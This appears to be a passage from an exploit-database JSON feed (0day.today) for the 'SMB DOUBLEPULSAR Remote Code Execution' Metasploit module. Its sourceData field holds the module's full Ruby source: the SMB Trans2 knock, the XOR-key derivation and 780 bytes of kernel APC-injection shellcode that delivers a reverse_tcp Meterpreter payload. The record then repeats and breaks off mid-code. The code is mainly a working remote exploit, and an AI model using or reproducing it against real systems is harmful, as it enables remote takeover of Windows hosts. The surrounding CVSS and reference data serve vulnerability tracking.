{"value": 7.5, "vector": "NONE", "modified": "2021-10-21T22:27:03", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-23] #"}, "lastseen": "2021-10-23T14:17:45", "differentElements": ["sourceData"], "edition": 52}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "182838d7f999efd7b6de5cf5ad62c3a6", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-23T22:13:27", "history": [], "viewCount": 112, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27802"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:156196"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96704", "SMNTC-96709", "SMNTC-96705", "SMNTC-96703", "SMNTC-96706"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0143", "MS:CVE-2017-0148", "MS:CVE-2017-0144"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-23T22:13:27", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-10-23T22:13:27", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize 